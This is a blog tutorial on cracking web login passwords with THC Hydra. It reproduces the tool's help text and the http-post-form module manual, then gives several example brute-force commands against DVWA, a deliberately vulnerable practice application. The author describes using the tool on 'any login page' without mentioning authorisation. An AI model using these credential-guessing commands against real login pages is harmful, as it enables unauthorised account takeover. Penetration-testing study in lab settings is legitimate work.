How to Cracking Login Password Using THC hydra

Posted by Suraj Singh on January 09, 2019 · 9 mins read
Hello readers,

Welcome Again To My Blog. readers, Today I am going to share with you, my personal experience with THC Hydra Attacking Tool. Basically, I usually use this tool to find Username And Password Of Any Login Page.
So, Let's Quickly Start Our Tutorial Demo.

Make Sure, Hydra is Installed Correctly, Check Here

Here, for Tutorial Purpose I am using DVWA (Damn Vulnerable Web Application). For More Info,

How To Setup DVWA in Virutal Box
Setup DVWA in Windows

Hydra User Manual

root@kali:~# hydra -h
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]

-R restore a previous aborted/crashed session
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to be attacked in parallel, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-w / -W TIME waittime for responses (32s) / between connects per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-U service module usage details
server the target server (use either this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)

Supported services: asterisk afp cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs - usage only allowed
for legal purposes. This tool is licensed under AGPL v3.0.
The newest version is always available at
These services were not compiled in: sapr3 oracle.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup.
E.g.: % export HYDRA_PROXY=socks5:// (or socks4:// or connect://)
% export HYDRA_PROXY_HTTP=http://proxy:8080
% export HYDRA_PROXY_AUTH=user:pass

hydra -l user -P passlist.txt
hydra -L userlist.txt -p defaultpw imap://
hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5

Hydra Http-post-form Module User Manual

bitforestinfo:~$ hydra -U http-post-form
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ( starting at 2019-01-09 14:35:53

Help for module http-post-form:
Module http-post-form requires the page and the parameters for the web form.

By default this module is configured to follow a maximum of 5 redirections in
a row. It always gathers a new cookie from the same URL without variables
The parameters take three ":" separated values, plus optional values.
(Note: if you need a colon in the option string as value, escape it with "\:", but do not escape a "\" with "\\".)

Syntax: <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
First is the page on the server to GET or POST to (URL).
Second is the POST/GET variables (taken from either the browser, proxy, etc.
with usernames and passwords being replaced in the "^USER^" and "^PASS^"
placeholders (FORM PARAMETERS)
Third is the string that it checks for an *invalid* login (by default)
Invalid condition login check can be preceded by "F=", successful condition
login check must be preceded by "S=".
This is where most people get it wrong. You have to check the webapp what a
failed string looks like and put it in this parameter!
The following parameters are optional:
C=/page/uri to define a different page to gather initial cookies from
(h|H)=My-Hdr\: foo to send a user defined HTTP header with each request
^USER^ and ^PASS^ can also be put into these headers!
Note: 'h' will add the user-defined header at the end
regardless it's already being sent by Hydra or not.
'H' will replace the value of that header if it exists, by the
one supplied by the user, or add the header at the end
Note that if you are going to put colons (:) in your headers you should escape them with a backslash (\).
All colons that are not option separators should be escaped (see the examples above and below).
You can specify a header without escaping the colons, but that way you will not be able to put colons
in the header value itself, as they will be interpreted by hydra as option separators.

"/:user=^USER&pass=^PASS^:failed:H=Authorization\: Basic dT1w:H=Cookie\: sessid=aaaa:h=X-User\: ^USER^:H=User-Agent\: wget"

Usage Example:

hydra -l admin -p password http-post-form "/login.php:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect."

Example Explaination:

Command Description
-l LOGIN or -L FILElogin with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE Domain Or IP
http-post-form Attacking Module
"/login.php:username=Page To Attack (POST Request)
^USER^&Username Pattern
password=^PASS^&Password pattern
Login=LoginOther Data
"F=" or "S="{successful if "S=" \/ Fail if "F="}=Search in Response
(h Or H)=My-Hdr foo to send a user defined HTTP header with each request


F= and S= Only Works if Provided String Only Occurs One Time. So, Use It Carefully.
Use Find Function Into Source Code To Match Any Word.
Use hydra -d for Debug -V for Print output, -o for output

More Example:

For Example, If You Want to See All Request and response
hydra -p password -l admin http-post-form "/login.php:username=^USER^&password=^PASS^:submit" -d
Direct Username And Password
hydra -p password -l admin http-post-form "/login.php:username=^USER^&password=^PASS^&Login=Login:S=General Instructions" -d
Or Try This
hydra http-post-form "/login.php:username=^USER^&password=^PASS^&Login=Login:S=General Instruction" -l admin -P ../files/pass_filter 

If Still, Facing Any Problem,
Comment Below.